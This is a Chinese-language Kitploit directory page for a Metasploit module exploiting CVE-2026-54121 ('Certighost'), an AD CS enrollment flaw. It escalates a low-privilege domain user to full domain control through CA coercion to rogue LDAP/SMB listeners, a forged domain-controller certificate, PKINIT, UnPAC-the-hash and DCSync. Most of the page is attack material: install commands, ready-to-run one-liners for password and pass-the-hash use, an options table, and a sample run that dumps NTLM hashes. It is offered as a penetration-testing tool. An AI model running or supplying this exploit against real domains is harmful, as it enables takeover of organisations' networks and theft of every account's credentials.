Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Metasploit-CVE-2026-54121-Certighost — 一个 Metasploit 辅助模块,通过滥用 AD CS 注册的“chase”回退机制,从任意低权限域用户提升至完全控制域环境。该模块可胁迫 CA 向攻击者控制的基础设施进行身份验证,随后签发一个可模拟域控制器的证书。 | Kitploit
工具/GitHubGitHub/nafiez/metasploit-cve-2026-54121-certighost
权限提升漏洞利用框架漏洞利用后渗透利用渗透测试红队
GitHubnafiez/metasploit-cve-2026-54121-certighost

Metasploit-CVE-2026-54121-Certighost

一个 Metasploit 辅助模块,通过滥用 AD CS 注册的“chase”回退机制,从任意低权限域用户提升至完全控制域环境。该模块可胁迫 CA 向攻击者控制的基础设施进行身份验证,随后签发一个可模拟域控制器的证书。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
321个月前尚未审核

Metasploit-CVE-2026-54121-Certighost

Certighost 最初由 h0j3n 和 Aniq Fakhrul 发现并利用。本仓库包含一个 Metasploit 辅助模块,通过滥用 AD CS 注册的“chase”回退机制,可将任意低权限域用户提升至完全控制域。攻击者可胁迫 CA 回连攻击者控制的基础设施进行身份认证,并签发一个冒充域控制器的证书。该证书用于 PKINIT,UnPAC-the-hash 可恢复 DC 的 NT 哈希,其余工作由 DCSync 完成。

安装

root@kitploit:~
mkdir -p ~/.msf4/modules/auxiliary/admin/dcerpc
cp cve_2026_54121_certighost.rb ~/.msf4/modules/auxiliary/admin/dcerpc/

验证其能否解析并加载:

root@kitploit:~
ruby -c ~/.msf4/modules/auxiliary/admin/dcerpc/cve_2026_54121_certighost.rb
root@kitploit:~
msfconsole -q -x "use auxiliary/admin/dcerpc/cve_2026_54121_certighost; show options; exit"

389 和 445 端口是特权端口,因此该模块必须以 root 身份运行。

使用

密码认证

MSF 单行命令

root@kitploit:~
sudo msfconsole -q -x "use auxiliary/admin/dcerpc/cve_2026_54121_certighost; set DOMAIN corp.local; set USERNAME jdoe; set PASSWORD 'Passw0rd!'; set DC_IP 10.0.0.10; set ACTION FULL; run" 

运行 msfconsole

root@kitploit:~
use auxiliary/admin/dcerpc/cve_2026_54121_certighost
set DOMAIN corp.local
set USERNAME jdoe
set PASSWORD 'Passw0rd!'
set DC_IP 10.0.0.10
set ACTION FULL
run

哈希传递(Pass-the-hash)

MSF 单行命令

root@kitploit:~
sudo msfconsole -q -x "use auxiliary/admin/dcerpc/cve_2026_54121_certighost; set DOMAIN corp.local; set USERNAME jdoe; set NTLM_HASH 69289a87353c7083842956a62652d46c; set DC_IP 10.0.0.10; set ACTION FULL; run"

运行 msfconsole

root@kitploit:~
use auxiliary/admin/dcerpc/cve_2026_54121_certighost
set DOMAIN corp.local
set USERNAME jdoe
set NTLM_HASH 69289a87353c7083842956a62652d46c
set DC_IP 10.0.0.10
set ACTION FULL
run

NTLM_HASH 接受纯 NT 哈希、:NT 或 LM:NT。当同时设置 PASSWORD 和 NTLM_HASH 时,以哈希为准。

仅获取证书

当您需要离线或稍后使用证书时,此模式非常有用:

root@kitploit:~
sudo msfconsole -q -x "use auxiliary/admin/dcerpc/cve_2026_54121_certighost; set DOMAIN corp.local; set USERNAME jdoe; set PASSWORD 'Passw0rd!'; set DC_IP 10.0.0.10; set ACTION REQUEST_CERT; run"

示例

成功利用

root@kitploit:~
$ msfconsole -q -x "use auxiliary/admin/dcerpc/cve_2026_54121_certighost; set DOMAIN contoso.lab; set USERNAME lowpriv; set PASSWORD Abc123,./; set DC_IP 192.168.10.10; set ACTION FULL;  run"

[*] Starting persistent handler(s)...
[*] Setting default action FULL - view all 3 actions with the show actions command
DOMAIN => contoso.lab
USERNAME => lowpriv
PASSWORD => Abc123,./
DC_IP => 192.168.10.10
ACTION => FULL
[*] Certighost (CVE-2026-54121)
[*] Step 1: Discovering infrastructure via LDAP...
[*]   Discovering CA...
[+]     Found CA: ContosoCert-CA (DC01.contoso.lab)
[*]   Discovering target DC...
[+]     Target DC: DC01$ (DC01.contoso.lab)
[+]   CA:      ContosoCert-CA (192.168.10.10)
[+]   Target:  DC01$
[+]   Domain SID: S-1-5-21-2005457936-2008376057-2514283296
[*] Step 2: Creating machine account via SAMR...
[+] Successfully created contoso.lab\GHOSTGQJZBJLO$
[+]   Password: CGf0a69633d2Aa1
[+]   SID:      S-1-5-21-2005457936-2008376057-2514283296-1756
[+]   Created: contoso.lab\GHOSTGQJZBJLO$
[*] Step 3: Starting rogue servers...
[*]   Listener IP: 192.168.44.128
[+]   Rogue LDAP server: 192.168.44.128:389
[+]   Rogue SMB server:  192.168.44.128:445
[*]   Pre-flighting Netlogon oracle...
[*] Connecting to the endpoint mapper service...
[+]   Netlogon oracle ready
[*] Step 4: Requesting certificate via ICertPassage...
[+]   Certificate issued!
[+]   PFX (loot):  /root/.msf4/loot/20260731030034_default_192.168.10.10_windows.ad.cs_287527.pfx
[+]   PFX (local): /root/DC01_certighost.pfx
[+]   Subject: /CN=DC01.contoso.lab
[+]   Issuer:  /DC=lab/DC=contoso/CN=ContosoCert-CA
[*] Step 5: Performing PKINIT as DC01$...
[+]   PKINIT successful - TGT for [email protected]
[+]   ccache saved: /root/DC01.ccache
[*]   Extracting NT hash from PAC...
[+] 192.168.10.10:88 - Received a valid TGS-Response
[*] 192.168.10.10:445 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20260731030034_default_192.168.10.10_mit.kerberos.cca_639932.bin
[+]   NT Hash: dc01$:aad3b435b51404eeaad3b435b51404ee:846704be57649a259c45b8ce773dcf8d
[*] Step 6: Performing DCSync...
[*]   Running DCSync as contoso.lab\DC01$ (output shown when complete)...
# NTLM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8c3efc486704d2ee71eebe71af14d86c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72446150d4b9a4dae4f0472fbb01b072:::
contoso.lab\lowpriv:1105:aad3b435b51404eeaad3b435b51404ee:69289a87353c7083842956a62652d46c:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:846704be57649a259c45b8ce773dcf8d:::
DESKTOP-JSB2FG3$:1106:aad3b435b51404eeaad3b435b51404ee:b7ca2860c012a21801407b5f5c45c453:::
GHOSTQMSEUHWX$:1751:aad3b435b51404eeaad3b435b51404ee:3e5e99d282391e10226f3d40111196ee:::
GHOSTGQJZBJLO$:1756:aad3b435b51404eeaad3b435b51404ee:cbe6ca2d2dffb6069be63ee0700a05cb:::
# Password history (pwdump format - uid:rid:lmhash:nthash:::):
Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:8c3efc486704d2ee71eebe71af14d86c:::
contoso.lab\lowpriv_history0:1105:82e343ae06e69d44033ee76a390286a8:8c3efc486704d2ee71eebe71af14d86c:::
DC01$_history0:1000:aad3b435b51404eeaad3b435b51404ee:3795fa26828ec5e8bf0dc948d2d82bbe:::
DESKTOP-JSB2FG3$_history0:1106:dbfadcdb0dd4f78c286e856dcc5ece74:a175b9f66ecd598f5bcf8185d0e2e322:::
[+]   DCSync complete - 26 secret line(s) shown, others suppressed for opsec
[*]   (SIDs, full pwdump, account info and kerberos-key sections hidden)
[*] Cleaning up: deleting GHOSTGQJZBJLO$ as Administrator (Administrator hash from DCSync)...
[+] The specified account has been deleted.
[+]   Deleted GHOSTGQJZBJLO$
[*] Auxiliary module execution completed

选项

root@kitploit:~
msf auxiliary(admin/dcerpc/cve_2026_54121_certighost) > show options

Module options (auxiliary/admin/dcerpc/cve_2026_54121_certighost):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   ACCOUNT_NAME                          no        The account name
   ACCOUNT_PASSWORD                      no        The password for the new account
   ADD_CERT_APP_POLICY                   no        Add certificate application policy OIDs
   ALT_DNS                               no        Alternative certificate DNS
   ALT_SID                               no        Alternative object SID
   ALT_UPN                               no        Alternative certificate UPN (format: USER@DOMAIN)
   CA_IP                                 no        CA IP (auto-discovered if empty)
   CA_NAME                               no        CA name (auto-discovered if empty)
   CERT_TEMPLATE        User             yes       The certificate template
   CLEANUP_ACCOUNT      true             no        Delete the machine account when finished. Needs privileged credentials: the accoun
                                                   t's own creator has no DELETE right on it. With ACTION FULL the Administrator hash
                                                    recovered by DCSync is used automatically
   CLEANUP_HASH                          no        LM:NT or NT hash for CLEANUP_USER (pass-the-hash)
   CLEANUP_PASS                          no        Password for CLEANUP_USER
   CLEANUP_USER                          no        Account used to delete the machine account (defaults to the Administrator hash rec
                                                   overed by DCSync, else USERNAME)
   DC_IP                                 yes       Domain Controller IP
   DOMAIN                                yes       Target domain FQDN (e.g., abc.local)
   LDAPDomain                            no        The domain to authenticate to
   LDAPPassword                           no        The password to authenticate with
   LDAPUsername                           no        The username to authenticate with
   LISTENER                              no        Attacker IP for rogue services (auto-detected if empty)
   NTLM_HASH                             no        NT hash for USERNAME, for pass-the-hash. Accepts LM:NT, :NT or a bare NT hash
   NTLM_VALIDATE        true             no        Validate the CA's NTLM auth via the Netlogon oracle. Set false to blindly accept i
                                                   t (no SMB signing) - useful to test whether the CA chase reaches LSA/LDAP at all,
                                                   but fails if the CA insists on signing
   ON_BEHALF_OF                          no        Username to request on behalf of (format: DOMAIN\USER)
   OUTPUT_DIR                            no        Directory for the .pfx and .ccache files (defaults to the current working director
                                                   y)
   PASSWORD                              no        User password (required unless NTLM_HASH is set)
   PFX                                   no        Certificate to request on behalf of
   RHOSTS                                no        Target host (auto-set from DC_IP)
   ROGUE_LDAP_PORT      389              no        Port for rogue LDAP server (CA defaults to 389)
   ROGUE_SMB_PORT       445              no        Port for rogue SMB/LSA server (CA defaults to 445)
   RPORT                389              yes       The target port (TCP)
   SMBDomain                             no        The Windows domain to use for authentication
   SMBPass                               no        The password for the specified username
   SMBUser                               no        The username to authenticate as
   SSL                  false            no        Enable SSL on the LDAP connection
   TARGET_DC                             no        Target DC sAMAccountName to impersonate (auto-discovered if empty)
   TEMPLATE             Machine          yes       Certificate template
   TIMEOUT              10               no        Seconds to wait for rogue servers to receive connections
   Timeout              10               yes       The TCP timeout to establish Kerberos connection and read data
   USERNAME                              yes       Low-privilege domain user


Auxiliary action:

   Name  Description
   ----  -----------
   FULL  Full attack: certificate + PKINIT + DCSync


View the full module info with the info, or info -d command.

参考链接

  • 技术分析 — H0j3n
  • 原始 PoC — aniqfakhrul
  • CVE-2026-54121
下载工具